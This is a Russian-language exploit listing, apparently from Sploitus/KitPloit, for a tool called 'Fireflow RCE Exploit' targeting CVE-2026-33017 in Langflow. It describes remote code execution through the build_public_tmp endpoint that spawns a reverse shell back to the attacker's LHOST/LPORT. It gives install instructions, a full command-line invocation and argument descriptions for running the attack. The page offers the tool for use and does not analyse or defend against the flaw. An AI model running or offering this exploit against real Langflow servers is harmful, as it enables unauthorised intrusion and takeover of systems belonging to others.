## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DIAMORPHINE666-CVE-2026-33017-EXPLOIT
# Fireflow RCE Exploit
Удаленное выполнение кода для Langflow через конечную точку `build_public_tmp`.
Эксплуатация через конечную точку сборки публичного потока, которая выполняет обратную оболочку на целевой системе.
## Требования
* Python 3.8+
* Библиотека `httpx`
Установка:
root@kitploit:~
pip install httpx
## Использование
root@kitploit:~
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
### Аргументы
* `-u, --url` : Базовый URL экземпляра Langflow (например, https://flow.example.com/)
* `-l, --lhost` : Ваш IP-адрес для получения обратной оболочки